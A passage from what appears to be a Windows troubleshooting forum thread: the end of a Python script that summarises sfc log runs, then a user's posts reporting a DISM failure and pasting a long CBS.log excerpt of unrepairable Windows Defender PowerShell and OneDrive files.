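# Constructed sample: two runs, the second with one unrepaired file.
SAMPLE = """\
2019-11-16 11:53:22, Info                  CSI    00000006 [SR] Verifying 1 components
2019-11-16 11:53:22, Info                  CSI    00000007 [SR] Beginning Verify and Repair transaction
2019-11-16 11:53:22, Info                  CSI    00000009 [SR] Verify complete
2019-11-26 17:49:53, Info                  CSI    00000008 [SR] Verifying 100 components
2019-11-26 17:49:53, Info                  CSI    00000009 [SR] Beginning Verify and Repair transaction
2019-11-26 17:49:54, Info                  CSI    0000006c [SR] Cannot repair member file "example.dll" of Example-Component, hash mismatch
2019-11-26 17:49:55, Info                  CSI    0000006e [SR] Verify complete
2019-11-26 17:49:55, Info                  CSI    0000006f [SR] Verifying 100 components
2019-11-26 17:49:55, Info                  CSI    00000070 [SR] Beginning Verify and Repair transaction
2019-11-26 17:49:57, Info                  CSI    000000d5 [SR] Verify complete
"""

if __name__ == "__main__":
    for i, run in enumerate(triage(SAMPLE), 1):
        print(f"run {i}: {run['start']} .. {run['end']}, "
              f"{run['components']} components, {len(run['findings'])} finding(s)")
        for ts, msg in run["findings"]:
            print(f"    {ts}  {msg}")
```

Only the lines listed under a run's findings need to go into a forum reply; the routine progress lines add nothing to the diagnosis.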


#11
spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

Before I proceed you should know that DISM stopped at 90.1% with error 1060.
I tried to copy the log's content here but it seems like it is freezing it.

As you have not mentioned what I should do in such a case, I conclude that regardless, you are expecting me to continue with the next steps.
So that is what I am going to do.


  • 0

#12
spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

sfc found problems that it could not repair. The log is below. Now I will take the next steps.

 

2019-11-26 17:54:40, Info                  CSI    00002d73 [SR] Verify complete
2019-11-26 17:54:40, Info                  CSI    00002d74 [SR] Verifying 100 components
2019-11-26 17:54:40, Info                  CSI    00002d75 [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:42, Info                  CSI    00002ddd [SR] Verify complete
2019-11-26 17:54:42, Info                  CSI    00002dde [SR] Verifying 100 components
2019-11-26 17:54:42, Info                  CSI    00002ddf [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:45, Info                  CSI    00002e46 [SR] Verify complete
2019-11-26 17:54:45, Info                  CSI    00002e47 [SR] Verifying 100 components
2019-11-26 17:54:45, Info                  CSI    00002e48 [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:47, Info                  CSI    00002eb4 [SR] Verify complete
2019-11-26 17:54:47, Info                  CSI    00002eb5 [SR] Verifying 100 components
2019-11-26 17:54:47, Info                  CSI    00002eb6 [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:49, Info                  CSI    00002f1e [SR] Verify complete
2019-11-26 17:54:49, Info                  CSI    00002f1f [SR] Verifying 100 components
2019-11-26 17:54:49, Info                  CSI    00002f20 [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:52, Info                  CSI    00002f89 [SR] Verify complete
2019-11-26 17:54:52, Info                  CSI    00002f8a [SR] Verifying 100 components
2019-11-26 17:54:52, Info                  CSI    00002f8b [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:54, Info                  CSI    00002ff0 [SR] Verify complete
2019-11-26 17:54:54, Info                  CSI    00002ff1 [SR] Verifying 100 components
2019-11-26 17:54:54, Info                  CSI    00002ff2 [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:56, Info                  CSI    00003059 [SR] Verify complete
2019-11-26 17:54:56, Info                  CSI    0000305a [SR] Verifying 100 components
2019-11-26 17:54:56, Info                  CSI    0000305b [SR] Beginning Verify and Repair transaction
2019-11-26 17:54:58, Info                  CSI    000030c0 [SR] Verify complete
2019-11-26 17:54:58, Info                  CSI    000030c1 [SR] Verifying 100 components
2019-11-26 17:54:58, Info                  CSI    000030c2 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:01, Info                  CSI    0000312c [SR] Verify complete
2019-11-26 17:55:01, Info                  CSI    0000312d [SR] Verifying 100 components
2019-11-26 17:55:01, Info                  CSI    0000312e [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:04, Info                  CSI    0000319b [SR] Verify complete
2019-11-26 17:55:04, Info                  CSI    0000319c [SR] Verifying 100 components
2019-11-26 17:55:04, Info                  CSI    0000319d [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:06, Info                  CSI    00003203 [SR] Verify complete
2019-11-26 17:55:06, Info                  CSI    00003204 [SR] Verifying 100 components
2019-11-26 17:55:06, Info                  CSI    00003205 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:09, Info                  CSI    0000326a [SR] Verify complete
2019-11-26 17:55:09, Info                  CSI    0000326b [SR] Verifying 100 components
2019-11-26 17:55:09, Info                  CSI    0000326c [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:13, Info                  CSI    00003309 [SR] Verify complete
2019-11-26 17:55:13, Info                  CSI    0000330a [SR] Verifying 100 components
2019-11-26 17:55:13, Info                  CSI    0000330b [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:17, Info                  CSI    00003373 [SR] Verify complete
2019-11-26 17:55:17, Info                  CSI    00003374 [SR] Verifying 100 components
2019-11-26 17:55:17, Info                  CSI    00003375 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:20, Info                  CSI    000033da [SR] Verify complete
2019-11-26 17:55:20, Info                  CSI    000033db [SR] Verifying 100 components
2019-11-26 17:55:20, Info                  CSI    000033dc [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:22, Info                  CSI    00003443 [SR] Verify complete
2019-11-26 17:55:22, Info                  CSI    00003444 [SR] Verifying 100 components
2019-11-26 17:55:22, Info                  CSI    00003445 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:24, Info                  CSI    000034b2 [SR] Verify complete
2019-11-26 17:55:25, Info                  CSI    000034b3 [SR] Verifying 100 components
2019-11-26 17:55:25, Info                  CSI    000034b4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:27, Info                  CSI    00003519 [SR] Verify complete
2019-11-26 17:55:27, Info                  CSI    0000351a [SR] Verifying 100 components
2019-11-26 17:55:27, Info                  CSI    0000351b [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:30, Info                  CSI    00003583 [SR] Verify complete
2019-11-26 17:55:30, Info                  CSI    00003584 [SR] Verifying 100 components
2019-11-26 17:55:30, Info                  CSI    00003585 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:33, Info                  CSI    000035f1 [SR] Verify complete
2019-11-26 17:55:33, Info                  CSI    000035f2 [SR] Verifying 100 components
2019-11-26 17:55:33, Info                  CSI    000035f3 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:35, Info                  CSI    0000365a [SR] Verify complete
2019-11-26 17:55:35, Info                  CSI    0000365b [SR] Verifying 100 components
2019-11-26 17:55:35, Info                  CSI    0000365c [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:38, Info                  CSI    000036d2 [SR] Verify complete
2019-11-26 17:55:38, Info                  CSI    000036d3 [SR] Verifying 100 components
2019-11-26 17:55:38, Info                  CSI    000036d4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:41, Info                  CSI    00003743 [SR] Verify complete
2019-11-26 17:55:41, Info                  CSI    00003744 [SR] Verifying 100 components
2019-11-26 17:55:41, Info                  CSI    00003745 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:43, Info                  CSI    000037ae [SR] Verify complete
2019-11-26 17:55:43, Info                  CSI    000037af [SR] Verifying 100 components
2019-11-26 17:55:43, Info                  CSI    000037b0 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:46, Info                  CSI    00003817 [SR] Verify complete
2019-11-26 17:55:46, Info                  CSI    00003818 [SR] Verifying 100 components
2019-11-26 17:55:46, Info                  CSI    00003819 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:48, Info                  CSI    0000387e [SR] Verify complete
2019-11-26 17:55:48, Info                  CSI    0000387f [SR] Verifying 100 components
2019-11-26 17:55:48, Info                  CSI    00003880 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:50, Info                  CSI    000038e7 [SR] Verify complete
2019-11-26 17:55:50, Info                  CSI    000038e8 [SR] Verifying 100 components
2019-11-26 17:55:50, Info                  CSI    000038e9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:52, Info                  CSI    00003952 [SR] Verify complete
2019-11-26 17:55:53, Info                  CSI    00003953 [SR] Verifying 100 components
2019-11-26 17:55:53, Info                  CSI    00003954 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:55, Info                  CSI    000039ba [SR] Verify complete
2019-11-26 17:55:55, Info                  CSI    000039bb [SR] Verifying 100 components
2019-11-26 17:55:55, Info                  CSI    000039bc [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:57, Info                  CSI    00003a21 [SR] Verify complete
2019-11-26 17:55:58, Info                  CSI    00003a22 [SR] Verifying 100 components
2019-11-26 17:55:58, Info                  CSI    00003a23 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:00, Info                  CSI    00003a8a [SR] Verify complete
2019-11-26 17:56:00, Info                  CSI    00003a8b [SR] Verifying 100 components
2019-11-26 17:56:00, Info                  CSI    00003a8c [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:02, Info                  CSI    00003af3 [SR] Verify complete
2019-11-26 17:56:03, Info                  CSI    00003af4 [SR] Verifying 100 components
2019-11-26 17:56:03, Info                  CSI    00003af5 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:05, Info                  CSI    00003b62 [SR] Verify complete
2019-11-26 17:56:06, Info                  CSI    00003b63 [SR] Verifying 100 components
2019-11-26 17:56:06, Info                  CSI    00003b64 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:10, Info                  CSI    00003bde [SR] Verify complete
2019-11-26 17:56:10, Info                  CSI    00003bdf [SR] Verifying 100 components
2019-11-26 17:56:10, Info                  CSI    00003be0 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:12, Info                  CSI    00003c4b [SR] Verify complete
2019-11-26 17:56:12, Info                  CSI    00003c4c [SR] Verifying 100 components
2019-11-26 17:56:12, Info                  CSI    00003c4d [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:14, Info                  CSI    00003cb2 [SR] Verify complete
2019-11-26 17:56:14, Info                  CSI    00003cb3 [SR] Verifying 100 components
2019-11-26 17:56:14, Info                  CSI    00003cb4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:16, Info                  CSI    00003d19 [SR] Verify complete
2019-11-26 17:56:16, Info                  CSI    00003d1a [SR] Verifying 100 components
2019-11-26 17:56:16, Info                  CSI    00003d1b [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:18, Info                  CSI    00003d80 [SR] Verify complete
2019-11-26 17:56:18, Info                  CSI    00003d81 [SR] Verifying 100 components
2019-11-26 17:56:18, Info                  CSI    00003d82 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:21, Info                  CSI    00003de7 [SR] Verify complete
2019-11-26 17:56:21, Info                  CSI    00003de8 [SR] Verifying 100 components
2019-11-26 17:56:21, Info                  CSI    00003de9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:23, Info                  CSI    00003e4e [SR] Verify complete
2019-11-26 17:56:23, Info                  CSI    00003e4f [SR] Verifying 100 components
2019-11-26 17:56:23, Info                  CSI    00003e50 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:25, Info                  CSI    00003eb5 [SR] Verify complete
2019-11-26 17:56:25, Info                  CSI    00003eb6 [SR] Verifying 100 components
2019-11-26 17:56:25, Info                  CSI    00003eb7 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:27, Info                  CSI    00003f1c [SR] Verify complete
2019-11-26 17:56:27, Info                  CSI    00003f1d [SR] Verifying 100 components
2019-11-26 17:56:27, Info                  CSI    00003f1e [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:29, Info                  CSI    00003f83 [SR] Verify complete
2019-11-26 17:56:29, Info                  CSI    00003f84 [SR] Verifying 100 components
2019-11-26 17:56:29, Info                  CSI    00003f85 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:31, Info                  CSI    00003fea [SR] Verify complete
2019-11-26 17:56:31, Info                  CSI    00003feb [SR] Verifying 100 components
2019-11-26 17:56:31, Info                  CSI    00003fec [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:33, Info                  CSI    00004051 [SR] Verify complete
2019-11-26 17:56:33, Info                  CSI    00004052 [SR] Verifying 100 components
2019-11-26 17:56:33, Info                  CSI    00004053 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:35, Info                  CSI    000040b8 [SR] Verify complete
2019-11-26 17:56:35, Info                  CSI    000040b9 [SR] Verifying 100 components
2019-11-26 17:56:35, Info                  CSI    000040ba [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:37, Info                  CSI    0000411f [SR] Verify complete
2019-11-26 17:56:37, Info                  CSI    00004120 [SR] Verifying 100 components
2019-11-26 17:56:37, Info                  CSI    00004121 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:40, Info                  CSI    00004186 [SR] Verify complete
2019-11-26 17:56:40, Info                  CSI    00004187 [SR] Verifying 100 components
2019-11-26 17:56:40, Info                  CSI    00004188 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:42, Info                  CSI    000041fa [SR] Verify complete
2019-11-26 17:56:42, Info                  CSI    000041fb [SR] Verifying 100 components
2019-11-26 17:56:42, Info                  CSI    000041fc [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:44, Info                  CSI    00004261 [SR] Verify complete
2019-11-26 17:56:44, Info                  CSI    00004262 [SR] Verifying 100 components
2019-11-26 17:56:44, Info                  CSI    00004263 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:46, Info                  CSI    000042c8 [SR] Verify complete
2019-11-26 17:56:46, Info                  CSI    000042c9 [SR] Verifying 100 components
2019-11-26 17:56:46, Info                  CSI    000042ca [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:48, Info                  CSI    0000432f [SR] Verify complete
2019-11-26 17:56:48, Info                  CSI    00004330 [SR] Verifying 100 components
2019-11-26 17:56:48, Info                  CSI    00004331 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:50, Info                  CSI    00004396 [SR] Verify complete
2019-11-26 17:56:50, Info                  CSI    00004397 [SR] Verifying 100 components
2019-11-26 17:56:50, Info                  CSI    00004398 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:52, Info                  CSI    000043fd [SR] Verify complete
2019-11-26 17:56:52, Info                  CSI    000043fe [SR] Verifying 100 components
2019-11-26 17:56:52, Info                  CSI    000043ff [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:53, Info                  CSI    00004464 [SR] Verify complete
2019-11-26 17:56:54, Info                  CSI    00004465 [SR] Verifying 100 components
2019-11-26 17:56:54, Info                  CSI    00004466 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:56, Info                  CSI    000044cb [SR] Verify complete
2019-11-26 17:56:56, Info                  CSI    000044cc [SR] Verifying 100 components
2019-11-26 17:56:56, Info                  CSI    000044cd [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:57, Info                  CSI    00004532 [SR] Verify complete
2019-11-26 17:56:57, Info                  CSI    00004533 [SR] Verifying 100 components
2019-11-26 17:56:57, Info                  CSI    00004534 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:59, Info                  CSI    00004599 [SR] Verify complete
2019-11-26 17:56:59, Info                  CSI    0000459a [SR] Verifying 100 components
2019-11-26 17:56:59, Info                  CSI    0000459b [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:00, Info                  CSI    0000459d [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    0000459f [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a1 [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a3 [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a5 [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a7 [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a9 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045ab [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045ad [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c1 [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c2 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045c4 [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c5 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045c7 [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c8 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045ca [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045cb [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045cd [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045ce [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d0 [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045d1 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d3 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045d4 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d6 [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045d7 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d9 [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045da [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045dd [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpComputerStatus.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e0 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreat.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e3 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatCatalog.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e6 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatDetection.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e9 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpPreference.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045ec [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpScan.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045ef [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpWDOScan.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045f2 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpSignature.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045f5 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\Defender.psd1; source file in store is also corrupted
2019-11-26 17:58:00, Info                  CSI    00005119 [SR] Verify complete
2019-11-26 17:58:00, Info                  CSI    0000511a [SR] Verifying 100 components
2019-11-26 17:58:00, Info                  CSI    0000511b [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:03, Info                  CSI    0000519a [SR] Verify complete
2019-11-26 17:58:03, Info                  CSI    0000519b [SR] Verifying 100 components
2019-11-26 17:58:03, Info                  CSI    0000519c [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:06, Info                  CSI    0000523f [SR] Verify complete
2019-11-26 17:58:07, Info                  CSI    00005240 [SR] Verifying 100 components
2019-11-26 17:58:07, Info                  CSI    00005241 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:09, Info                  CSI    000052a6 [SR] Verify complete
2019-11-26 17:58:09, Info                  CSI    000052a7 [SR] Verifying 100 components
2019-11-26 17:58:09, Info                  CSI    000052a8 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:14, Info                  CSI    0000532f [SR] Verify complete
2019-11-26 17:58:14, Info                  CSI    00005330 [SR] Verifying 100 components
2019-11-26 17:58:14, Info                  CSI    00005331 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:16, Info                  CSI    00005396 [SR] Verify complete
2019-11-26 17:58:16, Info                  CSI    00005397 [SR] Verifying 100 components
2019-11-26 17:58:16, Info                  CSI    00005398 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:18, Info                  CSI    000053fd [SR] Verify complete
2019-11-26 17:58:18, Info                  CSI    000053fe [SR] Verifying 100 components
2019-11-26 17:58:18, Info                  CSI    000053ff [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:20, Info                  CSI    0000546a [SR] Verify complete
2019-11-26 17:58:20, Info                  CSI    0000546b [SR] Verifying 100 components
2019-11-26 17:58:20, Info                  CSI    0000546c [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:24, Info                  CSI    000054d7 [SR] Verify complete
2019-11-26 17:58:24, Info                  CSI    000054d8 [SR] Verifying 100 components
2019-11-26 17:58:24, Info                  CSI    000054d9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:26, Info                  CSI    0000553e [SR] Verify complete
2019-11-26 17:58:26, Info                  CSI    0000553f [SR] Verifying 100 components
2019-11-26 17:58:26, Info                  CSI    00005540 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:28, Info                  CSI    000055a5 [SR] Verify complete
2019-11-26 17:58:28, Info                  CSI    000055a6 [SR] Verifying 100 components
2019-11-26 17:58:28, Info                  CSI    000055a7 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:30, Info                  CSI    0000560c [SR] Verify complete
2019-11-26 17:58:30, Info                  CSI    0000560d [SR] Verifying 100 components
2019-11-26 17:58:30, Info                  CSI    0000560e [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:32, Info                  CSI    00005674 [SR] Verify complete
2019-11-26 17:58:32, Info                  CSI    00005675 [SR] Verifying 100 components
2019-11-26 17:58:32, Info                  CSI    00005676 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:36, Info                  CSI    000056f4 [SR] Verify complete
2019-11-26 17:58:36, Info                  CSI    000056f5 [SR] Verifying 100 components
2019-11-26 17:58:36, Info                  CSI    000056f6 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:39, Info                  CSI    00005787 [SR] Verify complete
2019-11-26 17:58:39, Info                  CSI    00005788 [SR] Verifying 100 components
2019-11-26 17:58:39, Info                  CSI    00005789 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:41, Info                  CSI    000057ee [SR] Verify complete
2019-11-26 17:58:41, Info                  CSI    000057ef [SR] Verifying 100 components
2019-11-26 17:58:41, Info                  CSI    000057f0 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:44, Info                  CSI    0000585b [SR] Verify complete
2019-11-26 17:58:44, Info                  CSI    0000585c [SR] Verifying 100 components
2019-11-26 17:58:44, Info                  CSI    0000585d [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:45, Info                  CSI    0000585f [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:58:47, Info                  CSI    000058c4 [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:58:47, Info                  CSI    000058c5 [SR] This component was referenced by [l:116]'Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.f647690e04ff7e43581b577deaab5f78'
2019-11-26 17:58:47, Info                  CSI    000058c7 [SR] Could not reproject corrupted file \??\C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\OneDrive.lnk; source file in store is also corrupted
2019-11-26 17:58:47, Info                  CSI    000058ca [SR] Verify complete
2019-11-26 17:58:47, Info                  CSI    000058cb [SR] Verifying 100 components
2019-11-26 17:58:47, Info                  CSI    000058cc [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:49, Info                  CSI    00005931 [SR] Verify complete
2019-11-26 17:58:49, Info                  CSI    00005932 [SR] Verifying 100 components
2019-11-26 17:58:49, Info                  CSI    00005933 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:51, Info                  CSI    00005998 [SR] Verify complete
2019-11-26 17:58:52, Info                  CSI    00005999 [SR] Verifying 100 components
